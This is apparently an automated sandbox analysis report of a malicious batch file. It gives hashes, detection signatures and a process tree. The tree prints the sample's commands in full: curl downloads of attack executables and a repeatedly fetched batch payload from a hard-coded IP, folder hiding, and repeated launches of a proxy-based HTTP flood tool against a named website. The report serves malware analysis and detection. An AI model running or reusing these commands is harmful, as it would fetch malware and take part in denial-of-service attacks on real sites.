9a0dba241734efd7671abd5c9573b3c12d508cdd3ef8747d28eed011037aa553

Analysis

max time kernel
1050s
max time network
1050s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11/06/2024, 16:21

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

df13.bat
Size

2KB
MD5

5c314c5a8a5067a17de5a234aa554389
SHA1

581f004ed77b85bc3a110971cae24b682ff4b47e
SHA256

9a0dba241734efd7671abd5c9573b3c12d508cdd3ef8747d28eed011037aa553
SHA512

d87591896834fe9cfa3bdce38cce697cd4b3b72a28b560142bb3e24fbdf6b0f918b470d199f77e305e6b11ef1433ce2eb044b3292e1ee8fc9f0a2afa8d733e3e

Score

9^/10

discovery

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1433) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file

Executes dropped EXE 33 IoCs

pid	Process
3876	YzxHTTPs.exe
3908	YzxHTTPs.exe
4696	YzxHTTPs.exe
4980	YzxHTTPs.exe
460	YzxHTTPs.exe
1532	YzxHTTPs.exe
1900	YzxHTTPs.exe
4060	YzxHTTPs.exe
372	YzxHTTPs.exe
2904	YzxHTTPs.exe
1744	YzxHTTPs.exe
2252	YzxHTTPs.exe
4624	YzxHTTPs.exe
2040	YzxHTTPs.exe
64	YzxHTTPs.exe
3372	YzxHTTPs.exe
1124	YzxHTTPs.exe
4148	YzxHTTPs.exe
2516	YzxHTTPs.exe
1280	YzxHTTPs.exe
5088	YzxHTTPs.exe
2444	YzxHTTPs.exe
2948	YzxHTTPs.exe
2488	YzxHTTPs.exe
4944	YzxHTTPs.exe
2780	YzxHTTPs.exe
3324	YzxHTTPs.exe
448	YzxHTTPs.exe
4352	YzxHTTPs.exe
2712	YzxHTTPs.exe
1616	YzxHTTPs.exe
3928	YzxHTTPs.exe
1392	YzxHTTPs.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4440	timeout.exe
4056	timeout.exe
2400	timeout.exe
2688	timeout.exe
4892	timeout.exe
1408	timeout.exe
2360	timeout.exe
3160	timeout.exe
5088	timeout.exe
2388	timeout.exe
4044	timeout.exe
4260	timeout.exe
4556	timeout.exe
3048	timeout.exe
2616	timeout.exe
4288	timeout.exe
836	timeout.exe
2556	timeout.exe
3740	timeout.exe
4728	timeout.exe
3608	timeout.exe
2928	timeout.exe
3144	timeout.exe
5024	timeout.exe
4956	timeout.exe
396	timeout.exe
2056	timeout.exe
4572	timeout.exe
5024	timeout.exe
1384	timeout.exe
1196	timeout.exe
1352	timeout.exe
2388	timeout.exe
2660	timeout.exe
3172	timeout.exe
4896	timeout.exe
3804	timeout.exe
4920	timeout.exe
5088	timeout.exe
1660	timeout.exe
2316	timeout.exe
3640	timeout.exe
4620	timeout.exe
4476	timeout.exe
116	timeout.exe
4596	timeout.exe
4596	timeout.exe
4816	timeout.exe
3996	timeout.exe
4056	timeout.exe
3524	timeout.exe
4640	timeout.exe
2348	timeout.exe
1296	timeout.exe
4060	timeout.exe
4804	timeout.exe
4504	timeout.exe
5060	timeout.exe
2140	timeout.exe
4312	timeout.exe
4640	timeout.exe
4664	timeout.exe
1480	timeout.exe
2140	timeout.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
4980	YzxHTTPs.exe
4980	YzxHTTPs.exe
372	YzxHTTPs.exe
372	YzxHTTPs.exe
4060	YzxHTTPs.exe
4060	YzxHTTPs.exe
1900	YzxHTTPs.exe
1900	YzxHTTPs.exe
3908	YzxHTTPs.exe
3908	YzxHTTPs.exe
1532	YzxHTTPs.exe
1532	YzxHTTPs.exe
4696	YzxHTTPs.exe
4696	YzxHTTPs.exe
460	YzxHTTPs.exe
460	YzxHTTPs.exe
2904	YzxHTTPs.exe
2904	YzxHTTPs.exe
1744	YzxHTTPs.exe
1744	YzxHTTPs.exe
4624	YzxHTTPs.exe
4624	YzxHTTPs.exe
2516	YzxHTTPs.exe
2516	YzxHTTPs.exe
1124	YzxHTTPs.exe
1124	YzxHTTPs.exe
5088	YzxHTTPs.exe
5088	YzxHTTPs.exe
3372	YzxHTTPs.exe
3372	YzxHTTPs.exe
2444	YzxHTTPs.exe
2444	YzxHTTPs.exe
64	YzxHTTPs.exe
64	YzxHTTPs.exe
1280	YzxHTTPs.exe
1280	YzxHTTPs.exe
4148	YzxHTTPs.exe
4148	YzxHTTPs.exe
2040	YzxHTTPs.exe
2040	YzxHTTPs.exe
2488	YzxHTTPs.exe
2488	YzxHTTPs.exe
2780	YzxHTTPs.exe
2780	YzxHTTPs.exe
3324	YzxHTTPs.exe
3324	YzxHTTPs.exe
3928	YzxHTTPs.exe
3928	YzxHTTPs.exe
4944	YzxHTTPs.exe
4944	YzxHTTPs.exe
1392	YzxHTTPs.exe
1392	YzxHTTPs.exe
4352	YzxHTTPs.exe
4352	YzxHTTPs.exe
448	YzxHTTPs.exe
448	YzxHTTPs.exe
1616	YzxHTTPs.exe
1616	YzxHTTPs.exe
2712	YzxHTTPs.exe
2712	YzxHTTPs.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 900	2896	cmd.exe	82
PID 2896 wrote to memory of 900	2896	cmd.exe	82
PID 2896 wrote to memory of 4088	2896	cmd.exe	83
PID 2896 wrote to memory of 4088	2896	cmd.exe	83
PID 2896 wrote to memory of 4436	2896	cmd.exe	84
PID 2896 wrote to memory of 4436	2896	cmd.exe	84
PID 2896 wrote to memory of 424	2896	cmd.exe	85
PID 2896 wrote to memory of 424	2896	cmd.exe	85
PID 2896 wrote to memory of 4828	2896	cmd.exe	93
PID 2896 wrote to memory of 4828	2896	cmd.exe	93
PID 2896 wrote to memory of 1452	2896	cmd.exe	95
PID 2896 wrote to memory of 1452	2896	cmd.exe	95
PID 2896 wrote to memory of 4840	2896	cmd.exe	96
PID 2896 wrote to memory of 4840	2896	cmd.exe	96
PID 2896 wrote to memory of 2924	2896	cmd.exe	97
PID 2896 wrote to memory of 2924	2896	cmd.exe	97
PID 2896 wrote to memory of 3724	2896	cmd.exe	98
PID 2896 wrote to memory of 3724	2896	cmd.exe	98
PID 2896 wrote to memory of 1800	2896	cmd.exe	99
PID 2896 wrote to memory of 1800	2896	cmd.exe	99
PID 2896 wrote to memory of 4844	2896	cmd.exe	100
PID 2896 wrote to memory of 4844	2896	cmd.exe	100
PID 2896 wrote to memory of 884	2896	cmd.exe	101
PID 2896 wrote to memory of 884	2896	cmd.exe	101
PID 2896 wrote to memory of 2944	2896	cmd.exe	102
PID 2896 wrote to memory of 2944	2896	cmd.exe	102
PID 2896 wrote to memory of 1616	2896	cmd.exe	103
PID 2896 wrote to memory of 1616	2896	cmd.exe	103
PID 2896 wrote to memory of 1376	2896	cmd.exe	104
PID 2896 wrote to memory of 1376	2896	cmd.exe	104
PID 2896 wrote to memory of 1584	2896	cmd.exe	105
PID 2896 wrote to memory of 1584	2896	cmd.exe	105
PID 2896 wrote to memory of 624	2896	cmd.exe	106
PID 2896 wrote to memory of 624	2896	cmd.exe	106
PID 2896 wrote to memory of 4816	2896	cmd.exe	107
PID 2896 wrote to memory of 4816	2896	cmd.exe	107
PID 2896 wrote to memory of 4548	2896	cmd.exe	108
PID 2896 wrote to memory of 4548	2896	cmd.exe	108
PID 2896 wrote to memory of 5116	2896	cmd.exe	109
PID 2896 wrote to memory of 5116	2896	cmd.exe	109
PID 2896 wrote to memory of 4652	2896	cmd.exe	110
PID 2896 wrote to memory of 4652	2896	cmd.exe	110
PID 2896 wrote to memory of 732	2896	cmd.exe	111
PID 2896 wrote to memory of 732	2896	cmd.exe	111
PID 2896 wrote to memory of 3716	2896	cmd.exe	112
PID 2896 wrote to memory of 3716	2896	cmd.exe	112
PID 2896 wrote to memory of 4232	2896	cmd.exe	113
PID 2896 wrote to memory of 4232	2896	cmd.exe	113
PID 2896 wrote to memory of 316	2896	cmd.exe	114
PID 2896 wrote to memory of 316	2896	cmd.exe	114
PID 2896 wrote to memory of 3476	2896	cmd.exe	115
PID 2896 wrote to memory of 3476	2896	cmd.exe	115
PID 2896 wrote to memory of 3320	2896	cmd.exe	116
PID 2896 wrote to memory of 3320	2896	cmd.exe	116
PID 2896 wrote to memory of 3804	2896	cmd.exe	117
PID 2896 wrote to memory of 3804	2896	cmd.exe	117
PID 2896 wrote to memory of 4524	2896	cmd.exe	118
PID 2896 wrote to memory of 4524	2896	cmd.exe	118
PID 2896 wrote to memory of 4704	2896	cmd.exe	119
PID 2896 wrote to memory of 4704	2896	cmd.exe	119
PID 2896 wrote to memory of 2296	2896	cmd.exe	120
PID 2896 wrote to memory of 2296	2896	cmd.exe	120
PID 2896 wrote to memory of 4572	2896	cmd.exe	121
PID 2896 wrote to memory of 4572	2896	cmd.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
900	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df13.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\AppData\Roaming\hjUZ
  2⤵
  - Views/modifies file attributes
  PID:900
- C:\Windows\system32\curl.exe
  curl -s -o ua.txt http://185.254.97.190:4001/download/ua.txt
  2⤵
  PID:4088
- C:\Windows\system32\curl.exe
  curl -s -o proxy.txt http://185.254.97.190:4001/download/proxy.txt
  2⤵
  PID:4436
- C:\Windows\system32\curl.exe
  curl -s -o YzxHTTPs.exe http://185.254.97.190:4001/download/bypass.exe
  2⤵
  PID:424
- C:\Windows\system32\curl.exe
  curl -s -o XaZDFTLSV.exe http://185.254.97.190:4001/download/tlsv.exe
  2⤵
  PID:4828
- C:\Windows\system32\curl.exe
  curl -s -o AXzTTPSMIX.exe http://185.254.97.190:4001/download/httpsmix.exe
  2⤵
  PID:1452
- C:\Windows\system32\curl.exe
  curl -s -o ZDaSUDP.exe http://185.254.97.190:4001/download/udp.exe
  2⤵
  PID:4840
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2924
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3724
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1800
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4844
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:884
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2944
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1616
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1376
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1584
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:624
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4816
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4548
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5116
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4652
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:732
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3716
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4232
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:316
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3476
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3320
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4524
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4704
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4572
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4112
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3980
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:544
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1552
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1880
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2504
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3016
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2860
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4892
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:936
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3120
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3696
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:860
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4544
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4260
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4100
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1716
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3056
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1808
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1124
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1792
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4620
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3232
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4476
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3336
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4868
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2224
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1240
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1600
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3988
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1892
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3580
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1888
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2348
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1900
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2904
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4372
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:668
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1472
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4056
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5076
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3760
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:624
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1916
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1304
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4976
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3840
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2736
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1632
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3216
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4492
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3208
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:316
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3488
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2124
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4300
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5096
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2660
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4288
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:952
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4344
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2776
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4052
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1932
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:336
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4520
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4016
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2632
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1196
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3640
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2276
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4892
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4368
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4160
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2248
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1344
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3372
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2284
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1060
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1480
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:860
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:116
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:800
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1604
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3680
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1808
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1124
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3660
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2044
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:636
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4824
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4712
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5008
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:804
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5072
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2924
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:836
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1644
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1296
- C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
  YzxHTTPs.exe GET https://addicted2.ro/ proxy.txt 50 600 10
  2⤵
  - Executes dropped EXE
  PID:3876
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3908
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4696
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4980
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:460
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1532
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1900
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4060
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2904
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:372
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1744
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3588
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1040
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2996
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3184
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4744
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3868
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1920
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:436
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3524
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1344
